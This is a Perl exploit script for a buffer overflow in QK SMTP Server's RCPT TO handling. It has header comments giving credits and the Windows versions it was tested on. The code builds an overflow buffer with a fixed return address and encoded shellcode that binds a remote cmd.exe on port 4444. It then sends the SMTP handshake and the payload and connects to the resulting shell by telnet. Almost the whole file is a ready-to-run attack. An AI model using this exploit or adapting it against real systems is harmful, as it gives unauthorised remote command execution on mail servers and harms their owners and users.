#!/bin/perl
#
#http://www.securityfocus.com/bid/20681
#
#	tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it


if (@ARGV < 1) {
print "--------------------------------------------------------------------\n";
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";
print "--------------------------------------------------------------------\n";
}



use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
#my $eip="\x43\x43\x43\x43";	

my $eip="\x8f\x29\x46\x00";	#call esp in QKSmtpServer3.exe



$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";


$jmpback = "\x50\x73".
"\x54\x73".
"\x58\x73".
"\xb0".
"\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x50\x73".
"\xc3\x73";

my $buffer =("\x41"x296).$eip.("\x73"x2228).$sc.("\x45"x820).$jmpback."\x00";



my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;


$request = "helo acaro" . "\r\n";
send $socket, $request, 0;
print "[+] Sent helo request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "mail from: acaro@peaceandlove.peace" . "\r\n";
send $socket, $request, 0;
print "[+] Sent mail from request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "rcpt to: " . $buffer . "\r\n";
send $socket, $request, 0;
print "[+] Sent rcpt to request\n";



print " + connect on 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;